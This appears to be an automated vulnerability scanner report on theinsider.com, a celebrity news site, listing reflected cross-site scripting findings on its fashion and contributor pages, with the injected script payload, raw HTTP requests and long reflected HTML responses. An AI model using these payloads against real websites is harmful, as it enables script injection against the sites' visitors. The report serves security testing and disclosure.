<link rel="stylesheet" href="/css/main/main.css" type="text/css" /><!-- TRENDING BOX --><div id="trending_wrapper"><ul id="trending_list"><li><a href='/gossip/39237_Before_They_Were_Famous/index.html'><img src='/media/photo/2011/12/100371/megan_fox_416_tcanham_124432726.jpg' alt='' width='138' height='70' /></a><a href='/gossip/39237_Before_They_Were_Famous/index.html' class='trending_links'>Before They Were Famous</a></li><li class='dotted_separator'></li><li><a href='/movies/46991_Daniel_Craig_swim_scene_for_Skyfall/index.html'><img src='/media/photo/2011/12/100212/craig_416.jpg' alt='' width='138' height='70' /></a><a href='/movies/46991_Daniel_Craig_swim_scene_for_Skyfall/index.html' class='trending_links'>Daniel Craig (Swim)Suits Up For 'Skyfall'</a></li><li class='dotted_separator'></li><li><a href='/fashion/46993_The_Good_the_Bad_and_the_Ugly/index.html'><img src='/media/photo/2011/12/100316/leann_rimes_julianne_hough_416.jpg' alt='' width='138' height='70' /></a><a href='/fashion/46993_The_Good_the_Bad_and_the_Ugly/index.html' class='trending_links'>The Good, the Bad and the Ugly</a></li><li class='dotted_separator'></li><li><a href='/visitcalifornia/46918_Star_Ballers_and_their_Celeb_Fans/index.html'><img src='/media/photo/2011/12/99690/vid_kobe_bryant_416_112759001.jpg' alt='' width='138' height='70' /></a><a href='/visitcalifornia/46918_Star_Ballers_and_their_Celeb_Fans/index.html' class='trending_links'>Star Ballers and their Celeb Fans</a></li><li class='dotted_separator'></li></ul></div><!-- END HEADER --> <!-- BREAKING NEWS BOX --> <!-- END BREAKING NEWS BOX -->
<!-- END HEADER --> <!-- END HEADER --> <link rel="stylesheet" href="/css/music/music.css" type="text/css" /><style>#left_col { float: left; margin: 0 0 0 5px !important; padding: 0; width: 690px;}</style><!--[if IE 7]><style>.lovethis_storylist ul {list-style-type: none; margin-bottom: 10px; margin-top: 0; padding: 0; width: 140px; position: relative; left: -40px;}</style><![endif]--> <div id="main_content"> <div id="left_col"> <div id="channel_title_bar"> <a href="http://www.theinsider.com/music/"><img src="/media/img/channel_page_name_v3_music.png" class="channel_title_logo" alt="" /></a> </div><div class="content_container"> <div class='channelblock leftblock'><a target='_self' href='/music/47066_Common_and_John_Legend_Will_Make_You_Believers/index.html' class='black_text_link'><img src='/media/photo/2011/12/100358/commoncover_john_legend_416.jpg' alt='' /></a><div class='content_text horizontal_excerpt'><h4><a target='_self' href='/music/47066_Common_and_John_Legend_Will_Make_You_Believers/index.html' class='black_text_link horizontal_excerpt'>Common and John Legend Will Make You 'Believe'</a></h4><p>With the release of his latest studio album rapidly approaching, Common's been releasing single after single and doesn't disappoint with his latest song <em>The Believer</em>.</p><a target='_self' href='/music/47066_Common_and_John_Legend_Will_Make_You_Believers/index.html' class='channel_more_link'>READ</a></div><div class='clearfix'></div></div><div class='channelblock rightblock'><a target='_self' href='/music/47065_Cody_Simpson_not_dating_Kylie_Jenner/index.html' class='black_text_link'><img src='/media/photo/2011/12/100354/vid_keltie_416_111205.jpg' height='380' width='640' class='channel_vid_img' alt='' /></a><div class='vid_title'><h4><a target='_self' href='/music/47065_Cody_Simpson_not_dating_Kylie_Jenner/index.html' class='black_text_link'>Cody Simpson Talks Girls & Dolls!</a></h4></div><div class='vid_excerpt'><p>Last week the internet combusted with the rumor that Cody Simpson was dating Kylie Jenner, after the two were spotted together at The Grove.</p><a target='_self' href='/music/47065_Cody_Simpson_not_dating_Kylie_Jenner/index.html' class='channel_more_link'>WATCH VIDEO</a></div><div class='clearfix'></div></div><div class='channelblock leftblock'><a target='_self' href='/music/46987_Erin_Lucas_Playlist_December_6/index.html' class='black_text_link'><img src='/media/photo/2011/12/100132/erin_lucas_416.jpg' class='channel_vid_img' height='380' width='640' alt='' /></a><div class='vid_title'><h4><a target='_self' href='/music/46987_Erin_Lucas_Playlist_December_6/index.html' class='black_text_link'>6 Must Hear New Songs!</a></h4></div><div class='vid_excerpt'><p>Our music Insider Erin Lucas is back with another collection of fresh jams that you simply have to hear!</p><a target='_self' href='/music/46987_Erin_Lucas_Playlist_December_6/index.html' class='channel_more_link'>WATCH VIDEO</a></div><div class='clearfix'></div></div><div class='channelblock rightblock'><a target='_self' href='/music/46983_Madonna_Super_Bowl_Halftime_Show_confirmed/index.html' class='black_text_link'><img src='/media/photo/madonna_fshamim_231011_130115350_416_rev.jpg' alt='' /></a><div class='content_text horizontal_excerpt'><h4><a target='_self' href='/music/46983_Madonna_Super_Bowl_Halftime_Show_confirmed/index.html' class='black_text_link horizontal_excerpt'>Madonna Confirmed For Super Bowl Halftime Show!</a></h4><p>After more than a month of rumors, NBC aired a commercial during Sunday Night Football that officially confirmed Madonna would perform at the XLVI Super Bowl halftime show!</p><a target='_self' href='/music/46983_Madonna_Super_Bowl_Halftime_Show_confirmed/index.html' class='channel_more_link'>READ</a></div><div class='clearfix'></div></div><div class='channelblock leftblock'><a target='_self' href='/music/46957_Nicki_Minaj_drops_Rom..
- /fashion/

/fashion/

http://www.theinsider.com/fashion/?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00025E)%3C/..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x00025E)</script>

Request

GET /fashion/?'"--> HTTP/1.1
Referer: http://www.theinsider.com/fashion/index.html
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.theinsider.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Cache-Control: max-age=300
Date: Tue, 06 Dec 2011 06:54:59 GMT
Content-Length: 11024
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <!-- <base id="htmldom" href="http://www.theinsider.com/" /> --> <!-- This breaks links while in preview server --> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Celebrity Fashion | Celebrity Gossip | Entertainment News | Pop Culture | TheInsider | TheInsider.com</title> <meta name="description" content="" /> <meta name="keywords" content="" /> <meta name="category" content="fashion" /> <meta name="date" content="2011-05-26 11:31:00" /><meta property="og:title" content="Celebrity Fashion | Celebrity Gossip | Entertainment News | Pop Culture | TheInsider" /><meta property="og:type" content="article" /><meta property="og:url" content="http://www.theinsider.com/fashion/index.html" /><meta property="og:image" content="http://www.theinsider.com/media/img/insider_logo_05172011.jpg" /><meta property="og:description" content="Celebrity Fashion | Celebrity Gossip | Entertainment News | Pop Culture | TheInsider" /><meta property="og:site_name" content="www.theinsider.com" /><meta property="fb:app_id" content="123263397703043"/><PageMap><DataObject type="date"><Attribute name="displaydate" value="2011-05-26 11:31:00" /><Attribute name="sdate" value="20110526" /></DataObject><DataObject type="thumbnail"><Attribute name="src" value="http://www.theinsider.com/media/img/insider_logo_05172011.jpg" /><Attribute name="width" value="150" /><Attribute name="height" value="150" /></DataObject></PageMap> <link rel="stylesheet" href="/css/main/main.css" type="text/css" /> <link rel="stylesheet" href="/css/nivo-slider/nivo-slider.css" type="text/css" media="screen" /> <link rel="shortcut icon" href="http://www.theinsider.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> <script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script> <script src="http://www.theinsider.com/Scripts/swfobject_modified.js" type="text/javascript"></script> <script src="/js/jquery-1.4.2.min.js" type="text/javascript"></script><script src="/scripts/jquery.nivo.slider.pack.js" type="text/javascript"></script> <script src="Scripts/swfobject_modified.js" type="text/javascript"></script> <script type="text/javascript">$(document).ready(function() { $('#slider').nivoSlider({ effect:'slideInLeft', // Specify sets like: 'fold,fade,sliceDown' animSpeed:200, // Slide transition speed pauseTime:4000, // How long each slide will show startSlide:0, // Set starting Slide (0 index) directionNav:false, // Next & Prev navigation directionNavHide:true, // Only show on hover controlNav:true, // 1,2,3... navigation controlNavThumbs:true, // Use thumbnails for Control Nav controlNavThumbsFromRel:false, // Use image rel for thumbs controlNavThumbsSearch: '.jpg', // Replace this with... controlNavThumbsReplace: '_thumb.jpg', // ...this in thumb Image src keyboardNav:true, // Use left & right arrows pauseOnHover:true, // Stop animation while hovering manualAdvance:false, // Force manual transitions captionOpacity:1, // Universal caption opacity prevText: 'Prev', // Prev directionNav text nextText: 'Next', // Next directionNav text beforeChange: function(){}, // Triggers before a slide transition afterChange: function(){}, // Triggers after a slide transition slideshowEnd: function(){}, // Triggers after all slides have been shown lastSlide: function(){}, // Triggers when last slide is shown afterLoad: function(){} // Triggers when slider has loaded });});</script><style type='text/css'> .nivo-imageLink img{width:416px; height:234px;}</style><!--[if IE]> <style type="text/css"> #navbar li {line-height: 100% !important;} #navbar li span {margin-top:0px !important;} </style><![endif]--><link rel="stylesheet" href="http://detect.get.it/lb1/lightbox.css" /> <script> var getit_boxes = [ { id: 'lb1', width: 480, height: 235, noscroll: false, autopop: 'getit' } ]; </script> </head><body class="body"><!--start Meebo A--><script type="text/javascript">window.Meebo||function(c){function p(){return["<",i,' onload="var d=',g,";d.getElementsByTagName('head')[0].",j,"(d.",h,"('script')).",k,"='//cim.meebo.com/cim?iv=",a.v,"&",q,"=",c[q],c[l]?"&"+l+"="+c[l]:"",c[e]?"&"+e+"="+c[e]:"","'\"></",i,">"].join("")}var f=window,a=f.Meebo=f.Meebo||function(){(a._=a._||[]).push(arguments)},d=document,i="body",m=d[i],r;if(!m){r=arguments.callee;return setTimeout(function(){r(c)},100)}a.$={0:+new Date};a.T=function(u){a.$[u]=new Date-a.$[0]};a.v=5;var j="appendChild",h="createElement",k="src",l="lang",q="network",e="domain",n=d[h]("div"),v=n[j](d[h]("m")),b=d[h]("iframe"),g="document",o,s=function(){a.T("load");a("load")};f.addEventListener?f.addEventListener("load",s,false):f.attachEvent("onload",s);n.style.display="none";m.insertBefore(n,m.firstChild).id="meebo";b.frameBorder="0";b.name=b.id="meebo-iframe";b.allowTransparency="true";v[j](b);try{b.contentWindow[g].open()}catch(w){c[e]=d[e];o="javascript:var d="+g+".open();d.domain='"+d.domain+"';";b[k]=o+"void(0);"}try{var t=b.contentWindow[g];t.write(p());t.close()}catch(x){b[k]=o+'d.write("'+p().replace(/"/g,'\\"')+'");d.close();'}a.T(1)}({network:"theinsider"});</script><!--end Meebo A--><body class="body"> <!-- TOP LEADERBOARD AD --><div id='leaderboard-top-box'><div class="ad_center">
<!-- begin ad tag (tile=1) -->
<div class="dart_ad">
<script language="JavaScript" type="text/javascript">
//<![CDATA[
ord=Math.random()*10000000000000000;
document.write('<script type="text/javascript" src="http://ad.doubleclick.net/adj/theinsider.com/fashion;tile=1;sz=960x50,728x90;ord=' + ord + '?"><\/script>');

//]]>
</script>
<noscript>
<a href="http://ad.doubleclick.net/jump/theinsider.com/fashion;tile=1;sz=960x50,728x90;ord=123456789?" target="_blank" ><img src="http://ad.doubleclick.net/ad/theinsider.com/fashion;tile=1;sz=960x50,960x50;ord=123456789?" border="0" alt="" /></a>
</noscript>
</div>
<!-- end ad tag -->
</div></div><!-- END TOP LEADERBOARD AD --> <div id="container"> <!-- HEADER --> <!-- HEADER -->
<div id="header">
<!-- LOGO -->
<div id="logo"><a href="/index.html" title="The Insider.com"><span>The Insider.com</span></a></div>
<!-- END LOGO -->

<!-- SEARCH & SOCIAL BOX -->
<div id="header_search_social">

<!-- SOCIAL BOX -->
<div id="social_wrapper">

<a href="http://www.twitter.com/home?status=Fashion+Channel+Page+http://insdr.co/pcrbni+via+@theinsider" target="_blank" style="float:left; margin-right: 2px;"><img src="/media/img/header_twitter_icon.jpg" alt="twitter"></a>
<div class="addthis_toolbox addthis_default_style" addthis:url="http://www.theinsider.com" addthis:title="The Insider Homepage">

<a class="addthis_button_stumbleupon"></a>
<a class="addthis_button_facebook_like" fb:like:layout="button_count"></a>
</div>
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=ra-4e8e37c800be6a9a"></script>
<!-- AddThis Button END -->
<!-- END SOCIAL BOX -->

<!-- SEARCH BOX -->
<div id="search">
<div id="search_wrapper">
<form action="/search/index.html?sort=date-sdate" id="" method="POST">
<div>
<input type="text" class="searchbox" name="q" value="SEARCH" onclick="javascript:if(this.value == 'SEARCH THE INSIDER.COM'){this.value = '';}" />
<input type="image" src="http://www.theinsider.com/media/img/search_mag.jpg" class="searchbox_submit" value="" name="sa" />
<input type="hidden" name="hq" value="more:recent4" />
</div>
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
</div>
</div>
<!-- END SEARCH BOX -->
</div>
<!-- END SEARCH & SOCIAL BOX -->

<!-- NAVIGATION -->
<div id="navbar">
<ul>
<li class="navtab gossip"> <a href="/gossip/index.html">GOSSIP</a> </li>
<li class="navtab tv"> <a href="/tv/index.html">TV</a> </li>
<li class="navtab movies"> <a href="/movies/index.html">MOVIES</a> </li>
<li class="navtab fashion"> <a href="/fashion/index.html">FASHION</a> </li>
<li class="navtab music"> <a href="/music/index.html">MUSIC</a> </li>
<li class="navtab photos"> <a href="/photos/index.html">PHOTOS</a> </li>
<li class="navtab video"> <a href="/video/index.html">VIDEOS</a> </li>
<!-- Date to include TBD <li class="navtab celebs"> <a href="/celebs">CELEBS</a> </li> -->
</ul>
</div>
<!-- END NAVIGATION -->

<div class="clearfix"></div>

<h1>The Insider.com</h1>
</div>

<!-- TRENDING BOX -->
<link rel="stylesheet" href="/css/main/main.css" type="text/css" /><!-- TRENDING BOX --><div id="trending_wrapper"><ul id="trending_list"><li><a href='/gossip/39237_Before_They_Were_Famous/index.html'><img src='/media/photo/2011/12/100371/megan_fox_416_tcanham_124432726.jpg' alt='' width='138' height='70' /></a><a href='/gossip/39237_Before_They_Were_Famous/index.html' class='trending_links'>Before They Were Famous</a></li><li class='dotted_separator'></li><li><a href='/movies/46991_Daniel_Craig_swim_scene_for_Skyfall/index.html'><img src='/media/photo/2011/12/100212/craig_416.jpg' alt='' width='138' height='70' /></a><a href='/movies/46991_Daniel_Craig_swim_scene_for_Skyfall/index.html' class='trending_links'>Daniel Craig (Swim)Suits Up For 'Skyfall'</a></li><li class='dotted_separator'></li><li><a href='/fashion/46993_The_Good_the_Bad_and_the_Ugly/index.html'><img src='/media/photo/2011/12/100316/leann_rimes_julianne_hough_416.jpg' alt='' width='138' height='70' /></a><a href='/fashion/46993_The_Good_the_Bad_and_the_Ugly/index.html' class='trending_links'>The Good, the Bad and the Ugly</a></li><li class='dotted_separator'></li><li><a href='/visitcalifornia/46918_Star_Ballers_and_their_Celeb_Fans/index.html'><img src='/media/photo/2011/12/99690/vid_kobe_bryant_416_112759001.jpg' alt='' width='138' height='70' /></a><a href='/visitcalifornia/46918_Star_Ballers_and_their_Celeb_Fans/index.html' class='trending_links'>Star Ballers and their Celeb Fans</a></li><li class='dotted_separator'></li></ul></div><!-- END HEADER --> <!-- BREAKING NEWS BOX --> <!-- END BREAKING NEWS BOX -->
<!-- END HEADER --> <!-- END HEADER --> <link rel="stylesheet" href="/css/fashion/fashion.css" type="text/css" /><style>#left_col { float: left; margin: 0 0 0 5px !important; padding: 0; width: 690px;}</style><!--[if IE 7]><style>.lovethis_storylist ul {list-style-type: none; margin-bottom: 10px; margin-top: 0; padding: 0; width: 140px; position: relative; left: -40px;}</style><![endif]--> <div id="main_content"> <div id="left_col"> <div id="channel_title_bar"> <a href="http://www.theinsider.com/fashion/"><img src="/media/img/channel_page_name_v3_fashion.png" class="channel_title_logo" alt="" /></a> </div><div class="content_container"> <div class='channelblock leftblock'><a target='_self' href='/fashion/47105_Emily_Blunt_s_Opium_YSL_ad/index.html' class='black_text_link'><img src='/media/photo/2011/12/100422/emily_416.jpg' alt='' /></a><div class='content_text horizontal_excerpt'><h4><a target='_self' href='/fashion/47105_Emily_Blunt_s_Opium_YSL_ad/index.html' class='black_text_link horizontal_excerpt'>Emily Blunt's YSL ad: YES!</a></h4><p>I find Emily Blunt's special brand of charm and charisma to be intoxicating, so it's rather fitting she's now fronting YSL's newest fragrance: Opium.</p><a target='_self' href='/fashion/47105_Emily_Blunt_s_Opium_YSL_ad/index.html' class='channel_more_link'>READ</a></div><div class='clearfix'></div></div><div class='channelblock rightblock'><a target='_self' href='/fashion/46995_What_s_Going_on_Sarah_Jessica_Parker/index.html' class='black_text_link'><img src='/media/photo/2011/12/100330/sarah_jessica_parker_416_131207207_134862517.jpg' alt='' /></a><div class='content_text horizontal_excerpt'><h4><a target='_self' href='/fashion/46995_What_s_Going_on_Sarah_Jessica_Parker/index.html' class='black_text_link horizontal_excerpt'>What's Going on Sarah Jessica Parker?!</a></h4><p><em>Sex and the City</em> catapulted Sarah Jessica Parker into instant fashion icon status, and her real-life penchant for gorgeous, whimsical and other-worldly gowns cemented it. But her carefully crafted reputation has been put into serious question as of late with her dubious&nbsp; -- actually let's face it, straight up hideous -- red carpet outfits. Check out her recent sartorial disasters that has everyone asking, What's Going on With Sarah Jessica Parker?!?</p><a target='_self' href='/fashion/46995_What_s_Going_on_Sarah_Jessica_Parker/index.html' class='channel_more_link'>VIEW PHOTOS</a></div><div class='clearfix'></div></div><div class='channelblock leftblock'><a target='_self' href='/fashion/46993_The_Good_the_Bad_and_the_Ugly/index.html' class='black_text_link'><img src='/media/photo/2011/12/100316/leann_rimes_julianne_hough_416.jpg' alt='' /></a><div class='content_text horizontal_excerpt'><h4><a target='_self' href='/fashion/46993_The_Good_the_Bad_and_the_Ugly/index.html' class='black_text_link horizontal_excerpt'>The Good, the Bad and the Ugly</a></h4><p>Between the Trevor Project event in L.A. and Billboard's Women of the Year event in NYC, plenty of A-list ladies stepped out in style this weekend. Check out all the great looks, the not so great looks, and the mind-boggling bad one you have to see to believe.</p><a target='_self' href='/fashion/46993_The_Good_the_Bad_and_the_Ugly/index.html' class='channel_more_link'>VIEW PHOTOS</a></div><div class='clearfix'></div></div><div class='channelblock rightblock'><a target='_self' href='/fashion/46944_Lady_Gaga_s_X_Rated_Secret_to_Good_Skin/index.html' class='black_text_link'><img src='/media/photo/2011/12/99887/lady_gaga_416_awalker_133890986.jpg' alt='' /></a><div class='content_text horizontal_excerpt'><h4><a target='_self' href='/fashion/46944_Lady_Gaga_s_X_Rated_Secret_to_Good_Skin/index.html' class='black_text_link horizontal_excerpt'>Lady Gaga's X Rated Secret to Good Skin</a></h4><p>Well nobody ever accused Lady Gaga of being shy!</p><a target='_self' href='/fashion/46944_Lady_Gaga_s_X_Rated_Secret_to_..
- /contributor/jarett_wieselman/

/contributor/jarett_wieselman/

http://www.theinsider.com/contributor/jarett_wieselman/?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x000903)</script>

Request

GET /contributor/jarett_wieselman/?'"--> HTTP/1.1
Referer: http://www.theinsider.com/contributor/jarett_wieselman/index.html
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.theinsider.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 11618
Cache-Control: max-age=300
Date: Tue, 06 Dec 2011 06:56:44 GMT
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <!-- <base id="htmldom" href="http://www.theinsider.com/" /> --> <!-- This breaks links while in preview server --> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Jarett Wieselman Channel Page | TheInsider.com</title> <meta name="description" content="" /> <meta name="keywords" content="" /> <meta name="category" content="contributor_jarett_wieselman" /> <meta name="date" content="2011-10-21 16:33:00" /><meta property="og:title" content="Jarett Wieselman Channel Page" /><meta property="og:type" content="article" /><meta property="og:url" content="http://www.theinsider.com/contributor/jarett_wieselman/index.html" /><meta property="og:image" content="http://www.theinsider.com/media/img/insider_logo_05172011.jpg" /><meta property="og:description" content="Jarett Wieselman Channel Page" /><meta property="og:site_name" content="www.theinsider.com" /><meta property="fb:app_id" content="123263397703043"/><PageMap><DataObject type="date"><Attribute name="displaydate" value="2011-10-21 16:33:00" /><Attribute name="sdate" value="20111021" /></DataObject><DataObject type="thumbnail"><Attribute name="src" value="http://www.theinsider.com/media/img/insider_logo_05172011.jpg" /><Attribute name="width" value="150" /><Attribute name="height" value="150" /></DataObject></PageMap> <link rel="stylesheet" href="/css/main/main.css" type="text/css" /> <link rel="stylesheet" href="/4249800758/insider_v3/css/nivo-slider/nivo-slider.css" type="text/css" media="screen" /> <link rel="shortcut icon" href="http://www.theinsider.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> <script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script> <script src="http://www.theinsider.com/swfobject.js" type="text/javascript" ></script> <script src="http://www.theinsider.com/Scripts/swfobject_modified.js" type="text/javascript"></script> <script src="js/jquery.nivo.slider.pack.js" type="text/javascript"></script> <script type="text/javascript">$(window).load(function() { $('#slider').nivoSlider({ effect:'slideInLeft', // Specify sets like: 'fold,fade,sliceDown' animSpeed:200, // Slide transition speed pauseTime:4000, // How long each slide will show startSlide:0, // Set starting Slide (0 index) directionNav:false, // Next & Prev navigation directionNavHide:true, // Only show on hover controlNav:true, // 1,2,3... navigation controlNavThumbs:true, // Use thumbnails for Control Nav controlNavThumbsFromRel:false, // Use image rel for thumbs controlNavThumbsSearch: '.jpg', // Replace this with... controlNavThumbsReplace: '_thumb.jpg', // ...this in thumb Image src keyboardNav:true, // Use left & right arrows pauseOnHover:true, // Stop animation while hovering manualAdvance:false, // Force manual transitions captionOpacity:1, // Universal caption opacity prevText: 'Prev', // Prev directionNav text nextText: 'Next', // Next directionNav text beforeChange: function(){}, // Triggers before a slide transition afterChange: function(){}, // Triggers after a slide transition slideshowEnd: function(){}, // Triggers after all slides have been shown lastSlide: function(){}, // Triggers when last slide is shown afterLoad: function(){} // Triggers when slider has loaded });});</script><style type='text/css'> .nivo-imageLink img{width:416px; height:234px;}</style><!--[if IE]> <style type="text/css"> #navbar li {line-height: 100% !important;} #navbar li span {margin-top:0px !important;} </style><![endif]--></head><body class='body jarett_wieselman'><!--start Meebo A--><script type="text/javascript">window.Meebo||function(c){function p(){return["<",i,' onload="var d=',g,";d.getElementsByTagName('head')[0].",j,"(d.",h,"('script')).",k,"='//cim.meebo.com/cim?iv=",a.v,"&",q,"=",c[q],c[l]?"&"+l+"="+c[l]:"",c[e]?"&"+e+"="+c[e]:"","'\"></",i,">"].join("")}var f=window,a=f.Meebo=f.Meebo||function(){(a._=a._||[]).push(arguments)},d=document,i="body",m=d[i],r;if(!m){r=arguments.callee;return setTimeout(function(){r(c)},100)}a.$={0:+new Date};a.T=function(u){a.$[u]=new Date-a.$[0]};a.v=5;var j="appendChild",h="createElement",k="src",l="lang",q="network",e="domain",n=d[h]("div"),v=n[j](d[h]("m")),b=d[h]("iframe"),g="document",o,s=function(){a.T("load");a("load")};f.addEventListener?f.addEventListener("load",s,false):f.attachEvent("onload",s);n.style.display="none";m.insertBefore(n,m.firstChild).id="meebo";b.frameBorder="0";b.name=b.id="meebo-iframe";b.allowTransparency="true";v[j](b);try{b.contentWindow[g].open()}catch(w){c[e]=d[e];o="javascript:var d="+g+".open();d.domain='"+d.domain+"';";b[k]=o+"void(0);"}try{var t=b.contentWindow[g];t.write(p());t.close()}catch(x){b[k]=o+'d.write("'+p().replace(/"/g,'\\"')+'");d.close();'}a.T(1)}({network:"theinsider"});</script><!--end Meebo A--><!-- TOP LEADERBOARD AD --><body class="body"> <div id="leaderboard-top-box"><div class="ad_center">
<!-- begin ad tag (tile=1) -->
<div class="dart_ad">
<script language="JavaScript" type="text/javascript">
//<![CDATA[
ord=Math.random()*10000000000000000;
document.write('<script type="text/javascript" src="http://ad.doubleclick.net/adj/theinsider.com/contributor_jarett_wieselman;tile=1;sz=960x50,728x90;ord=' + ord + '?"><\/script>');

//]]>
</script>
<noscript>
<a href="http://ad.doubleclick.net/jump/theinsider.com/contributor_jarett_wieselman;tile=1;sz=960x50,728x90;ord=123456789?" target="_blank" ><img src="http://ad.doubleclick.net/ad/theinsider.com/contributor_jarett_wieselman;tile=1;sz=960x50,960x50;ord=123456789?" border="0" alt="" /></a>
</noscript>
</div>
<!-- end ad tag -->
</div></div><!-- END TOP LEADERBOARD AD --> <div id="container"> <!-- HEADER --> <!-- HEADER -->
<div id="header">
<!-- LOGO -->
<div id="logo"><a href="/index.html" title="The Insider.com"><span>The Insider.com</span></a></div>
<!-- END LOGO -->

<!-- SEARCH & SOCIAL BOX -->
<div id="header_search_social">

<!-- SOCIAL BOX -->
<div id="social_wrapper">

<a href="http://www.twitter.com/home?status=Jarett+Wieselman+Channel+Page+http://insdr.co/r7Onf2+via+@theinsider" target="_blank" style="float:left; margin-right: 2px;"><img src="/media/img/header_twitter_icon.jpg" alt="twitter"></a>
<div class="addthis_toolbox addthis_default_style" addthis:url="http://www.theinsider.com" addthis:title="The Insider Homepage">

<a class="addthis_button_stumbleupon"></a>
<a class="addthis_button_facebook_like" fb:like:layout="button_count"></a>
</div>
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=ra-4e8e37c800be6a9a"></script>
<!-- AddThis Button END -->
<!-- END SOCIAL BOX -->

<!-- SEARCH BOX -->
<div id="search">
<div id="search_wrapper">
<form action="/search/index.html?sort=date-sdate" id="" method="POST">
<div>
<input type="text" class="searchbox" name="q" value="SEARCH" onclick="javascript:if(this.value == 'SEARCH THE INSIDER.COM'){this.value = '';}" />
<input type="image" src="http://www.theinsider.com/media/img/search_mag.jpg" class="searchbox_submit" value="" name="sa" />
<input type="hidden" name="hq" value="more:recent4" />
</div>
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
</div>
</div>
<!-- END SEARCH BOX -->
</div>
<!-- END SEARCH & SOCIAL BOX -->

<!-- NAVIGATION -->
<div id="navbar">
<ul>
<li class="navtab gossip"> <a href="/gossip/index.html">GOSSIP</a> </li>
<li class="navtab tv"> <a href="/tv/index.html">TV</a> </li>
<li class="navtab movies"> <a href="/movies/index.html">MOVIES</a> </li>
<li class="navtab fashion"> <a href="/fashion/index.html">FASHION</a> </li>
<li class="navtab music"> <a href="/music/index.html">MUSIC</a> </li>
<li class="navtab photos"> <a href="/photos/index.html">PHOTOS</a> </li>
<li class="navtab video"> <a href="/video/index.html">VIDEOS</a> </li>
<!-- Date to include TBD <li class="navtab celebs"> <a href="/celebs">CELEBS</a> </li> -->
</ul>
</div>
<!-- END NAVIGATION -->

<div class="clearfix"></div>

<h1>The Insider.com</h1>
</div>

<!-- TRENDING BOX -->
<link rel="stylesheet" href="/css/main/main.css" type="text/css" /><!-- TRENDING BOX --><div id="trending_wrapper"><ul id="trending_list"><li><a href='/gossip/39237_Before_They_Were_Famous/index.html'><img src='/media/photo/2011/12/100371/megan_fox_416_tcanham_124432726.jpg' alt='' width='138' height='70' /></a><a href='/gossip/39237_Before_They_Were_Famous/index.html' class='trending_links'>Before They Were Famous</a></li><li class='dotted_separator'></li><li><a href='/movies/46991_Daniel_Craig_swim_scene_for_Skyfall/index.html'><img src='/media/photo/2011/12/100212/craig_416.jpg' alt='' width='138' height='70' /></a><a href='/movies/46991_Daniel_Craig_swim_scene_for_Skyfall/index.html' class='trending_links'>Daniel Craig (Swim)Suits Up For 'Skyfall'</a></li><li class='dotted_separator'></li><li><a href='/fashion/46993_The_Good_the_Bad_and_the_Ugly/index.html'><img src='/media/photo/2011/12/100316/leann_rimes_julianne_hough_416.jpg' alt='' width='138' height='70' /></a><a href='/fashion/46993_The_Good_the_Bad_and_the_Ugly/index.html' class='trending_links'>The Good, the Bad and the Ugly</a></li><li class='dotted_separator'></li><li><a href='/visitcalifornia/46918_Star_Ballers_and_their_Celeb_Fans/index.html'><img src='/media/photo/2011/12/99690/vid_kobe_bryant_416_112759001.jpg' alt='' width='138' height='70' /></a><a href='/visitcalifornia/46918_Star_Ballers_and_their_Celeb_Fans/index.html' class='trending_links'>Star Ballers and their Celeb Fans</a></li><li class='dotted_separator'></li></ul></div><!-- END HEADER --> <!-- BREAKING NEWS BOX --> <!-- END BREAKING NEWS BOX -->
